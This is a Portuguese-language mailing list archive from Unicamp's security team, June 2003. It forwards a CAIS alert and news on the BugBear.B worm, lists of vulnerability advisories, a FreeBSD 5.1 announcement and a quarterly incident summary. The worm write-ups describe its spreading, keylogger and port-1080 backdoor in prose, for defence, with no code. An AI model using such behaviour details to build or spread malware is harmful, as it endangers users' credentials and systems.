noticias dao conta de que este virus atingiu nivel 4 em uma escala de 1 a 5, e que o Brasil e' o segundo pais mais infectado. Maiores informacoes, incluindo formas de prevencao, podem ser encontradas em http://informatica.terra.com.br/virusecia/index.html , mas a opcao mais eficaz parece ser abandonar o Outlook. --rro ] [http://idgnow.terra.com.br/idgnow/internet/2003/06/0018] Vírus Bugbear se torna ameaça de alto risco Quinta-feira, 5 de Junho de 2003 - 12h43 A McAfee Security alerta para o aparecimento do W32/Bugbear.b em MM, que passou a ser classificado como ameaça de alto risco. A vacina para a ameaça já encontra-se disponível no site da McAfee, juntamente com as informações do vírus. Para acessá-la, clique aqui. De origem desconhecida, a nova variante do vírus Bugbear é um vírus polimórfico, com capacidade de se propagar por e-mail e via compartilhamento de rede, além de interromper os processos de sofwares de segurança, que estejam carregados na máquina. A ameaça se envia a todos os endereços encontrados no sistema local. Cada endereço é colocado nos campos TO: (Para:) e From: (De:). Dessa forma, o endereço do remetente é falsificado, não indicando o usuário realmente infectado. O vírus extrai os endereços a partir da máquina da vítima, de arquivos com as seguintes extensões: .DBX, .EML, INBOX, .MBX, .MMF, .NCH, .ODS e .TBB. Nesta nova variante do BugBear, dezenas de possíveis linhas do campo Assunto da mensagem são utilizadas. Entre estas estão: Announcement, bad news, CALL FOR INFORMATION!, click on this!, fantastic, Get a FREE gift!, its easy, Please Help..., Tools For Your Online Business e Your Gift. O corpo da mensagem varia e pode conter fragmentos de arquivos encontrados na máquina da vítima. Os nomes de anexos também variam, mas podem conter as seguintes strings como Card, Docs, image, news, photo, song e video. As extensões são .exe, .pif e .scr. Sua propagação também é feita através de cópias para a pasta Startup de máquinas remotas na rede. O Cavalo de Tróia de acesso remoto abre a porta TCP 1080, permitindo ao invasor acessar e "comandar" o sistema comprometido. O vírus infecta dezenas de executáveis da máquina como: mplayer.exe, AIM95\aim.exe, CuteFTP\cutftp32.exe, ICQ\Icq.exe, Internet Explorer\iexplore.exe, kazaa\kazaa.exe, MSN Messenger\msnmsgr.exe, Outlook Express\msimn.exe, QuickTime\QuickTimePlayer.exe, Real\RealPlayer\realplay.exe, Windows Media Player\mplayer2.exe, entre outros. Qualquer suspeita ou dúvidas quanto ao novo vírus, podem ser encaminhadas para o serviço WebImmune (www.webimmune.net). O site esclarece, gratuitamente, se há ou não infecção. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 6 16:43:13 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 6 Jun 2003 16:43:13 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030606194313.GA2653@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 05/06/2003 ---------- Mandrake Linux Security Update Advisory (MDKSA-2003:064) Assunto: vulnerabilidade de seguranca no pacote kon2. http://www.security.unicamp.br/docs/bugs/2003/06/v15.txt 06/06/2003 ---------- CAIS-Alerta Assunto: Propagacao do worm W32.BugBear.B http://www.security.unicamp.br/docs/bugs/2003/06/v14.txt SuSE Security Announcement (SuSE-SA:2003:0028) Assunto: vulnerabilidade de seguranca no pacote cups. http://www.security.unicamp.br/docs/bugs/2003/06/v16.txt SuSE Security Announcement (SuSE-SA:2003:0029) Assunto: vulnerabilidade de seguranca no pacote pptpd. http://www.security.unicamp.br/docs/bugs/2003/06/v17.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Fri Jun 6 13:23:31 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 6 Jun 2003 13:23:31 -0300 Subject: [SECURITY-L] CAIS-Alerta: Propagacao do worm W32.BugBear.B Message-ID: <20030606162331.GI1915@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Propagacao do worm W32.BugBear.B To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Fri, 6 Jun 2003 13:03:59 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS tem detectado, desde a manha de 05/06/2003, um aumento significativo nas atividades de uma nova variante do virus BugBear, conhecido como W32.BugBear.B. O W32.BugBear.B e´ virus do tipo worm que contem as mesmas funcionalidades de seu antecessor, mais algumas capacidades de infeccao de arquivos e criacao de backdoor. Em uma analise feita pelo CAIS, foi possivel identificar as seguintes funcionalidades do virus: . Transmissao atraves de anexo em e-mail. O virus se utiliza de um bug no Microsoft Internet Explorer para tentar se executar automaticamente quando a vitima visualiza o e-mail. Caso o bug esteja corrigido, o anexo deve ser executado para o virus infectar a maquina. Repare que no primeiro caso, a infeccao pode ocorrer sem sequer o arquivo ter sido executado pelo usuario. O nome do anexo pode ser formado por uma lista de nomes pré-definidos, mais qualquer uma das extensoes .EXE, .PIF ou .SCR. Ex: photo.exe ou readme.scr. . Apos a infeccao, o virus se copia automaticamente para o diretorio de inicializacao do Windows. Este diretorio pode ser "C:\Windows\All Users\Start Menu\Programs\StartUp", ou entao "C:\Documents and Settings\All Users\Start Menu\Programs\Startup", dependendo de sua versao do Windows. O nome do arquivo e´ composto de 4 letras aleatorias, mais a extensao .EXE. . Transmissao atraves de compartilhamentos do Windows. O virus tenta identificar na rede, maquinas com o compartilhamento aberto (sem senha), e se copia para os diretorios de inicializacao do Windows das maquinas remotas. . Coleta de todos os enderecos de e-mails armazenados no computador da vitima. Todos os e-mails armazenados no "Address Book" do Outlook, ou em arquivos de cookies, arquivos temporarios do Internet Explorer, arquivos texto ou com as seguintes extensoes: .ODS, INBOX, .MMF, .NCH, .MBX, .EML, .TBB, .DBX. O virus tenta entao descobrir no registro do Windows as configuracoes de servidor de e-mail SMTP, e comeca a enviar mensagens infectadas para todos os enderecos encontrados. O subject e o texto da mensagem contem fragmentos de e-mails e textos encontrados no computador da propria vitima, por isso os e-mails "parecem" bastante reais. . O virus tenta desativar uma serie de programas de antivirus e firewall pessoais instalados. . Diferente da versao original do virus, esta variante tambem tenta infectar uma serie de programas bastante utilizados, tais como Kazaa, Winamp, Media Player, Real Audio Player, Internet Explorer, Notepad, ICQ, Winzip, entre outros. . Um "keylogger" e´ executado junto com o virus. O keylogger e´ um programa que captura todas as teclas digitadas pelo usuario, e armazena em um arquivo criptografado. Assim, o virus consegue capturar senhas de banco, cartoes de credito e informacoes digitadas pelo usuario. O keylogger é instalado no diretorio SYSTEM ou SYSTEM32 do Windows. O nome do arquivo é composto de 7 letras aleatorias, com extensao .DLL. Dois outros arquivos .DLL, com nomes de 7 letras aleatorias, sao criados no mesmo diretorio. . O virus abre um backdoor na porta 1080 da maquina infectada. Este backdoor permite que um atacante entre posteriormente na maquina e tenha controle sobre a mesma. Como remover o virus? ===================== A remocao do virus pode ser feita com versoes atualizadas de antivirus. Para remocao completa dos arquivos do virus, lembre-se de iniciar o computador em "safe-mode". Basta reiniciar o computador, e logo apos a mensagem de boot, pressionar a tecla F8. Se o sistema operacional utilizado pelo usuario e´ o Windows ME ou Windows XP, sera´ necessario desativar a opcao de "System Restore". Veja a URL abaixo para saber como proceder: . http://vil.nai.com/vil/SystemHelpDocs/DisableSysRestore.htm Caso o virus tenha infectado arquivos de aplicacoes, talvez seja necessario reinstalar os mesmos. Isto porque existe a possibilidade do antivirus nao poder prosseguir com a desinfeccao, e neste caso, tais arquivos serao completamente removidos. Sendo assim, como medida preventiva, o CAIS sugere que se mantenha uma lista de tudo que o antivirus remover, para proceder com a reinstalacao apos a desinfeccao. Maiores informacoes sobre W32.BugBear.B podem ser encontradas nas URLs abaixo: . http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BUGBEAR.B . http://www.symantec.com/avcenter/venc/data/w32.bugbear.b em mm.html . http://securecomputing.stanford.edu/alerts/bugbear.html . http://www.messagelabs.com/viruseye/info/default.asp?virusname=W32/BugBear.B-mm Baseado nestas informacoes, o CAIS recomenda fortemente a todos os usuarios que mantenham seus antivírus sempre atualizados, com frequencia diaria ou de forma automatica, e nao abram anexos de qualquer especie sem antes analisa´-lo com um antivirus, e mesmo assim se certificar da autenticidade do endereco de origem do e-mail. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPuC7kekli63F4U8VAQFAHgQAolgL7A62xTu4AbGiPc2VBMBWgRdPERS8 4yCxIgn6qvZabfMyXR5XEDp78Y4A6pzJiMiPzsFYBe2wq3cTx3MWTPWSMtsB2njM qMgntoumg53OBTUF0FS4vcS8AvlU945Je23Y1okvG30iYwWCRG0bVPYnSPACFo85 l9GqtpuYaZ8= =9Y/9 -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Mon Jun 9 13:45:27 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Mon, 9 Jun 2003 13:45:27 -0300 Subject: [SECURITY-L] [FreeBSD-Announce] FreeBSD 5.1 Released! Message-ID: <20030609164527.GA543@ccuec.unicamp.br> ----- Forwarded message from Scott Long ----- From: Scott Long Subject: [FreeBSD-Announce] FreeBSD 5.1 Released! To: freebsd-announce em freebsd.org Date: Mon, 9 Jun 2003 09:36:57 -0700 (PDT) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 It is my great privilege and pleasure to announce the availability of FreeBSD 5.1-RELEASE. This release continues FreeBSD on the path of advanced multiprocessor and application thread support and includes many improved and widely-sought features: - Experimental 1:1 and M:N thread libraries provide kernel support for efficient application multithreading. - Support for Physical Address Extensions enables Pentium Pro and higher CPUs to access up to 64GB of RAM. - Experimental Name Service Switch infrastructure allows enterprises to seamlessly integrate with LDAP and Active Directory services. - Enhanced "jail" management, allowing one server to provide many different "virtual machines" with reduced administrator workload. - New device drivers include support for IBM/Adaptec ServeRAID controllers, expanded support for USB 2.0 and USB Ethernet adapters, and Promise Serial ATA controllers. - Experimental support for the amd64 platform allows FreeBSD to run on single processor AMD Opteron systems. Although stability is greatly improved and many bugs have been fixed, FreeBSD 5.1 might not be suitable for all users. More conservative users may prefer to continue using FreeBSD 4.X. Information on the various trade-offs involved, as well as some notes on future plans for both FreeBSD 4.X and 5.X, can be found in the Early Adopter's Guide, available here: http://www.FreeBSD.org/releases/5.1R/early-adopter.html For a complete list of new features and known problems, please see the release notes and errata list, available here: http://www.FreeBSD.org/releases/5.1R/relnotes.html http://www.FreeBSD.org/releases/5.1R/errata.html For more information about FreeBSD release engineering activities, please see: http://www.FreeBSD.org/releng/ This release is dedicated to the memory of Alan Eldridge. Alan was a talented and dedicated member of the KDE On FreeBSD team and the FreeBSD community, and his passing is mourned by all of us. For more information, please see http://freebsd.kde.org/memoriam/alane.php Availability - ------------ FreeBSD 5.1-RELEASE supports the i386, pc98, alpha, sparc64, and ia64 architectures and can be installed directly over the net using the boot floppies or copied to a local NFS/FTP server. Distributions for all architectures are available now. Please continue to support the FreeBSD Project by purchasing media from one of our supporting vendors. The following companies will be offering FreeBSD 5.1 based products: FreeBSD Mall, Inc. http://www.freebsdmall.com/ Daemonnews, Inc. http://www.bsdmall.com/freebsd1.html If you can't afford FreeBSD on media, are impatient, or just want to use it for evangelism purposes, then by all means download the ISO images. We can't promise that all the mirror sites will carry the larger ISO images, but they will at least be available from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ ftp://ftp12.FreeBSD.org/pub/FreeBSD/ ftp://ftp.tw.FreeBSD.org/pub/FreeBSD/ ftp://ftp{2,3,4,5}.jp.freebsd.org/pub/FreeBSD/ ftp://ftp.cz.FreeBSD.org/pub/FreeBSD/ ftp://ftp7.de.FreeBSD.org/pub/FreeBSD/ ftp://ftp.lt.FreeBSD.org/pub/FreeBSD/ ftp://ftp2.za.FreeBSD.org/pub/FreeBSD/ ftp://ftp.se.FreeBSD.org/pub/FreeBSD/ ftp://ftp{1,2,4}.ru.FreeBSD.org/pub/FreeBSD/ FreeBSD is also available via anonymous FTP from mirror sites in the following countries: Argentina, Australia, Brazil, Bulgaria, Canada, China, Czech Republic, Denmark, Estonia, Finland, France, Germany, Hong Kong, Hungary, Iceland, Ireland, Japan, Korea, Lithuania, Saraville, the Netherlands, New Zealand, Poland, Portugal, Romania, Russia, Saudi Arabia, South Africa, Slovak Republic, Slovenia, Spain, Sweden, Taiwan, Thailand, Ukraine, and the United Kingdom. Before trying the central FTP site, please check your regional mirror(s) first by going to: ftp://ftp..FreeBSD.org/pub/FreeBSD Any additional mirror sites will be labeled ftp2, ftp3 and so on. More information about FreeBSD mirror sites can be found at: http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.ht ml For instructions on installing FreeBSD, please see Chapter 2 of The FreeBSD Handbook. It provides a complete installation walk-through for users new to FreeBSD, and can be found online at: http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/install.html Acknowledgments - --------------- Many companies donated equipment, network access, or man-hours to finance the release engineering activities for FreeBSD 5.1 including The FreeBSD Mall, Compaq, Yahoo!, Sentex Communications, and NTT/Verio. The release engineering team for 5.1-RELEASE includes: Scott Long Release Engineering, IA32 and Alpha Release Building Bruce A. Mah Release Engineering, Documentation Robert Watson Release Engineering, Security John Baldwin Release Engineering Murray Stokely Release Engineering Bill Fenner Spac64 Release Building Marcel Moolenaar IA64 Release Building Peter Wemm AMD64 Release Building Takahashi Yoshihiro PC98 Release Building Kris Kennaway Package Building Jacques A. Vidrine Security Officer -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+5JlXHTr20QF8Xr8RAktPAJ4h7vzidM3mj6S8Lbgx/iv4WFE33ACgxfd0 3o9ODDm2ZCDqZPkNBT49cVY= =lHeX -----END PGP SIGNATURE----- _______________________________________________ freebsd-announce em freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-announce To unsubscribe, send any mail to "freebsd-announce-unsubscribe em freebsd.org" ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Jun 11 11:05:00 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 11 Jun 2003 11:05:00 -0300 Subject: [SECURITY-L] CAIS-Resumo: Abril a Junho de 2003 Message-ID: <20030611140458.GD1356@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Resumo: Abril a Junho de 2003 To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Wed, 11 Jun 2003 10:53:21 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- ************************************************************************ CAIS Resumo Alertas, vulnerabilidades e incidentes de segurança Publicação trimestral do Centro de Atendimento a Incidentes de Segurança da Rede Nacional de Ensino e Pesquisa Abril a Junho de 2003 ======================================================================== Como e´ de conhecimento da comunidade atuante na area de seguranca, o CERT/CC divulga a cada tres meses o CERT Summary, fazendo um resumo sobre os alertas, vulnerabilidades e incidentes ocorridos nos ultimos meses. Analogamente ao trabalho desenvolvido pelo CERT, O CAIS divulga uma publicacao em separado, o "CAIS Resumo", que segue a mesma filosofia, porem com foco nos dados registrados pelo CAIS e na realidade das redes brasileiras. Neste segundo CAIS Resumo sao abordados os alertas, vulnerabilidades e demais acontecimentos que se destacaram na area de seguranca no segundo trimestre de 2003. ________________________________________________________________________ DESTAQUES 1. No dia 29 de marco, o CERT/CC divulgou o alerta CA-2003-12 tratando de vulnerabilidade remota no Sendmail. No mesmo dia o CAIS reportou um alerta sobre esta seria vulnerabilidade, uma vez que o Sendmail e' o MTA de maior uso na Internet e o impacto da exploracao poderia ser catastrofico. 2. No dia 2 de abril, o CAIS divulgou o alerta ALR-02042003 tratando da crescente atividade de fraudes em Internet Banking. Este tipo de fraude bancaria tem se expandido e continua sendo uma seria ameaca para os usuarios destes servicos. 3. No dia 17 de abril, o CERT/CC divulgou o alerta CA-2003-13 tratando de vulnerabilidades no Snort que e' uma das ferramentas de deteccao de intrusao (IDS) de maior uso hoje na Internet. Uma das vulnerabilidades permitia comprometer o sistema sem que o atacante conhecesse o IP do sistema IDS. Foi o segundo alerta do ano relacionado com a ferramenta Snort. 4. No dia 14 de maio, o CAIS divulgou alerta relacionado com a propagacao do worm "Fizzer". A propagacao deste worm era realizada atraves do aplicativo P2P Kazaa ou por e-mail. As principais caracteristicas do worm incluiam: possuir ferramentas de negacao de servico (DoS) e de captura de dados digitados ("keylogger"), assim como o envio massivo de mensagens ("mass-mailing"). 5. Ainda no dia 14 de maio, o CAIS divulgou alerta relacionado com o aumento de atividade de reconhecimento na porta 17300/tcp. A constatacao e analise desta atividade foi possivel gracas ao mecanismo de monitoracao de acessos a portas mantido pelo CAIS. Foi possivel identificar que tais acessos estavam diretamente relacionados com a atividade de um meta-trojan denominado "Milkit". 6. No dia 4 de junho, o CAIS divulgou alerta relacionado com o aumento de atividade de reconhecimento na porta 901/tcp. A constatacao e analise desta atividade foi possivel gracas ao mecanismo de monitoracao de acessos a portas mantido pelo CAIS. Sao duas as possiveis causas desta atividade: o desenvolvimento de uma nova versao do trojan "Net.Devil" ou uma forma alternativa de se identificar sistemas que possuem Samba ja' que a porta 901 e' utilizada pelo Swat (Samba Web Admin Tool) que e' a ferramenta de administracao web do Samba. 7. No dia 5 de junho, o CAIS divulgou alerta relacionado com o aumento de atividade de reconhecimento na porta 161 - SNMP. A constatacao e analise desta atividade foi possivel gracas ao mecanismo de monitoracao de acessos a portas mantido pelo CAIS. As portas mencionadas sao normalmente utilizadas pelo SNMP, Simple Network Management Protocol, protocolo amplamente usado no gerenciamento de redes TCP/IP. Sistemas SNMP vulneraveis sao potenciais alvos de ataques com resultados serios em razao da sua larga utilizacao em equipamentos estrategicos para a infraestrura de redes. 8. No dia 6 de junho, o CAIS divulgou alerta relacionado com a propagacao do worm "W32.BugBear.B". A nova variante do worm "BugBear" instalava uma ferramenta de captura de dados digitados (keylogger) e deixava um backdoor na maquina infectada (porta 1080) que podia ser utilizado para acesso posterior. O CAIS criou um ambiente de analise em laboratorio a fim de identificar as caracteristicas do worm. ________________________________________________________________________ ALERTAS Os alertas divulgados ou repassados pelo CAIS, com maior destaque e repercussao nos ultimos tres meses de 2003, sao listados abaixo e estao disponiveis em: http://www.rnp.br/cais/alertas/2003/ Alerta do CAIS ALR-06062003 Propagação do worm W32.BugBear.B [CAIS, 06.06.2003] Alerta do CAIS ALR-05062003 Aumento de atividade na porta 161 - SNMP [CAIS, 05.06.2003] Alerta do CAIS ALR-04062003 Aumento de atividade na porta 901/tcp [CAIS, 04.06.2003] Microsoft Security Bulletin MS03-020 Patch Acumulativo para o Internet Explorer (818529) [Microsoft, 04.06.2003] CERT Summary CS-2003-02 [Cert, 03.06.2003] Microsoft Security Bulletin MS03-019 Vulnerabilidade no ISAPI Extension do Windows Media Services (817772) [Microsoft, 28.05.2003] Microsoft Security Bulletin MS03-018 Patch Acumulativo para o IIS (811114) [Microsoft, 28.05.2003] Alerta do CAIS ALR-14052003 Aumento de atividade na porta 17300/tcp [CAIS, 14.05.2003] AUSCERT AL-2003.07 Propagação do Worm Fizzer [Auscert, 13.05.2003] Microsoft Security Bulletin MS03-017 Vulnerabilidade no Windows Media Player (817787) [Microsoft, 07.05.2003] Microsoft Security Bulletin MS03-016 Patch Acumulativo para o Microsoft BizTalk Server (815206) [Microsoft, 30.04.2003] Alerta do CAIS ALR-25042003 Exploração da Vulnerabilidade do WebDAV (IIS 5.0) [CAIS, 25.04.2003] Microsoft Security Bulletin MS03-015 Patch Acumulativo para o Internet Explorer (813489) [Microsoft, 23.04.2003] Microsoft Security Bulletin MS03-014 Patch Acumulativo para o Outlook Express (330994) [Microsoft, 23.04.2003] CERT Advisory CA-2003-13 Múltiplas vulnerabilidades no Snort [Cert, 17.04.2003] Microsoft Security Bulletin MS03-013 Vulnerabilidade no Kernel do Windows (811493) [Microsoft, 16.04.2003] Microsoft Security Bulletin MS03-012 Vulnerabilidade no Microsoft Winsock Proxy e ISA Firewall (331066) [Microsoft, 09.04.2003] Microsoft Security Bulletin MS03-011 Vulnerabilidade no Microsoft virtual machine (816093) [Microsoft, 09.04.2003] Advisories/Seti em home Vulnerabilidade no aplicativo SETI em home [Seti em home, 07.04.2003] Security Advisory DDI-1013 Nova vulnerabilidade no SAMBA [Digital Defense, 07.04.2003] Alerta do CAIS ALR-02042003 Fraudes em Internet Banking [CAIS, 02.04.2003] Cert Advisory CA-2003-12 Remote Buffer Overflow in Sendmail - Nova vulnerabilidade [Cert, 29.03.2003] CAIS Resumo RES-012003 [CAIS, 27.03.2003] Microsoft Security Bulletin MS03-010 Vulnerabilidade no Microsoft RPC Endpoint Mapper (331953) [Microsoft, 26.03.2003] Cert Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino [Cert, 26.03.2003] CERT Summary CS-2003-01 [Cert, 21.03.2003] CERT Advisory CA-2003-10 Vulnerabilidade na biblioteca XDR [Cert, 19.03.2003] Microsoft Security Bulletin MS03-009 Vulnerabilidade existente na implementação da detecção de intrusão do ISA [Microsoft, 19.03.2003] Microsoft Security Bulletin MS03-008 Vulnerabilidade existente na implementação do Windows Script Engine [Microsoft, 19.03.2003] ________________________________________________________________________ CAIS NA MIDIA A seguir, sao listadas algumas reportagens (artigos, entrevistas concedidas pela equipe do CAIS, etc), relacionadas aos temas destacados anteriormente: "Técnicos do CAIS dão curso de auditoria durante WSEG" [Notícias RNP, 02.06.2003] "CSIRTs no Brasil: disseminadores da cultura de segurança" [Módulo Security Magazine, 26.05.2003] "Técnicos da RNP vencem desafio do SANS" [Notícias RNP, 20.05.2003] "Spam: quanto se perde e como evitar? - Parte1" [Módulo Security Magazine, 28.04.2003] "CAIS/RNP lança documento trimestral sobre segurança" [Módulo Security Magazine, 27.03.2003] ________________________________________________________________________ NOTAS O CAIS ressalta que manter os sistemas e aplicativos atualizados, seguir uma politica de seguranca, orientar os usuarios, sao algumas das praticas recomendadas para diminuir os riscos de comprometimento de sua rede, alem de contribuir para o aumento da seguranca da Internet como um todo. O CAIS recomenda aos administradores que se mantenham cientes e conscientes dos alertas, correcoes e atualizacoes disponibilizadas pelos fabricantes e orgaos de renome na area de seguranca. ======================================================================== CAIS Centro de Atendimento a Incidentes de Segurança Rede Nacional de Ensino e Pesquisa http://www.cais.rnp.br cais em cais.rnp.br (19) 3787-3300 (19) 3787-3301 [fax] Chave PGP do CAIS disponível em: http://www.cais.rnp.br/cais-pgp.key Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPuc0Wekli63F4U8VAQFhGwQAm4dw0Nx2v+GywMx9NFWg99yMZ4ras3hq W7xM7eaJzs6jZqA50kOJYhcXGyL33NFKE5fP2a4Gtdz9ZdTXZVaWFakXDD7818wK daWqcEGQHvCTjT5y3Oowm66s1YwhYSRNwFOJYMTp9g0/5AzKzEoM4J7o2ScVHle+ wKvizxZM7fA= =KhI7 -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 12 09:15:00 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 12 Jun 2003 09:15:00 -0300 Subject: [SECURITY-L] [CAIS-Artigo]: "Effects of Worms on Internet Routing Stability" Message-ID: <20030612121500.GA19833@ccuec.unicamp.br> ----- Forwarded message from "Liliana E. Velasquez Alegre Solha" ----- From: "Liliana E. Velasquez Alegre Solha" Subject: [GTS-L] [CAIS-Artigo]: "Effects of Worms on Internet Routing Stability" To: gts-l em listas.unesp.br Date: Thu, 12 Jun 2003 07:41:45 -0300 (BRT) Pessoal, Um artigo bastante interessante, tratando sobre o impacto dos worms no roteamento e infra-estrutura de redes Internet como um todo, foi publicado pela SecurityFocus. Effects of Worms on Internet Routing Stability By Ido Dubrawsky http://www.securityfocus.com/infocus/1702 Um abraco, Liliana Solha CAIS/RNP ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 12 09:15:21 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 12 Jun 2003 09:15:21 -0300 Subject: [SECURITY-L] [CAIS-Artigo]: "The Enemy Within: Firewalls and Backdoors" Message-ID: <20030612121521.GB19833@ccuec.unicamp.br> ----- Forwarded message from "Liliana E. Velasquez Alegre Solha" ----- From: "Liliana E. Velasquez Alegre Solha" Subject: [S] [CAIS-Artigo]: "The Enemy Within: Firewalls and Backdoors" To: seguranca em pangeia.com.br Date: Thu, 12 Jun 2003 08:01:19 -0300 (BRT) Mais um artigo interessante da Security Focus. The Enemy Within: Firewalls and Backdoors By Bob Rudis and Phil Kostenbader http://www.securityfocus.com/infocus/1701 " This article presents an overview of modern backdoor techniques, discusses how they can be used to bypass the security infrastructure that exists in most network deployments and issues a wake-up call for those relying on current technologies to safeguard their systems/networks." Um abraco, Nina CAIS/RNP ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 12 10:06:20 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 12 Jun 2003 10:06:20 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030612130619.GA20081@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 03/06/2003 ---------- Novell, Inc (NOVL-2003-2966181) Assunto: HTTPSTK DOS. http://www.security.unicamp.br/docs/bugs/2003/06/v19.txt 05/06/2003 ---------- Novell, Inc (NOVL-2003-2966205) Assunto: iChain 2.2 Field Patch 1a. http://www.security.unicamp.br/docs/bugs/2003/06/v20.txt 06/06/2003 ---------- Debian Security Advisory (DSA 308-1) Assunto: vulnerabilidade de seguranca no pacote gzip. http://www.security.unicamp.br/docs/bugs/2003/06/v21.txt Debian Security Advisory (DSA 309-1) Assunto: vulnerabilidade de seguranca no pacote eterm. http://www.security.unicamp.br/docs/bugs/2003/06/v22.txt 08/06/2003 ---------- Debian Security Advisory (DSA 310-1) Assunto: vulnerabilidade de seguranca no pacote xaos. http://www.security.unicamp.br/docs/bugs/2003/06/v24.txt Debian Security Advisory (DSA 311-1) Assunto: vulnerabilidade de seguranca no kernel. http://www.security.unicamp.br/docs/bugs/2003/06/v23.txt 09/06/2003 ---------- Immunix Secured OS Security Advisory (IMNX-2003-7+-016-01) Assunto: vulnerabilidade de seguranca nos pacotes tetex, psutils, w3c-libwww. http://www.security.unicamp.br/docs/bugs/2003/06/v25.txt Debian Security Advisory (DSA 312-1) Assunto: vulnerabilidade de seguranca no pacote kernel-patch-2.4.18-powerpc. http://www.security.unicamp.br/docs/bugs/2003/06/v26.txt 11/06/2003 ---------- CAIS-Resumo: Abril a Junho de 2003 http://www.security.unicamp.br/docs/bugs/2003/06/v18.txt OpenPKG Security Advisory (OpenPKG-SA-2003.031) Assunto: vulnerabilidade de seguranca no pacote gzip. http://www.security.unicamp.br/docs/bugs/2003/06/v27.txt Mandrake Linux Security Update Advisory (MDKSA-2003:066) Assunto: vulnerabilidade de seguranca no kernel. http://www.security.unicamp.br/docs/bugs/2003/06/v28.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Jun 12 10:27:12 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 12 Jun 2003 10:27:12 -0300 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20030612132712.GA20140@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticia e/ou revistas eletronicas: 09/06/2003 ---------- SANS Critical Vulnerability Analysis Vol 2 No 22 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b4.txt SecurityFocus Newsletter #200 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2003/06/b5.txt 10/06/2003 ---------- Módulo Security News no.296 Fonte: Módulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2003/06/b6.txt SANS NewsBites Vol. 5 Num. 23 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b7.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Fri Jun 13 09:01:24 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 13 Jun 2003 09:01:24 -0300 Subject: [SECURITY-L] ntp leakage: ntp version, processor and OS info Message-ID: <20030613120124.GA22458@ccuec.unicamp.br> ----- Forwarded message from Klaus Steding-Jessen ----- From: Klaus Steding-Jessen Subject: [IRT-L] ntp leakage: ntp version, processor and OS info To: irt-l em listas.unesp.br Date: Thu, 12 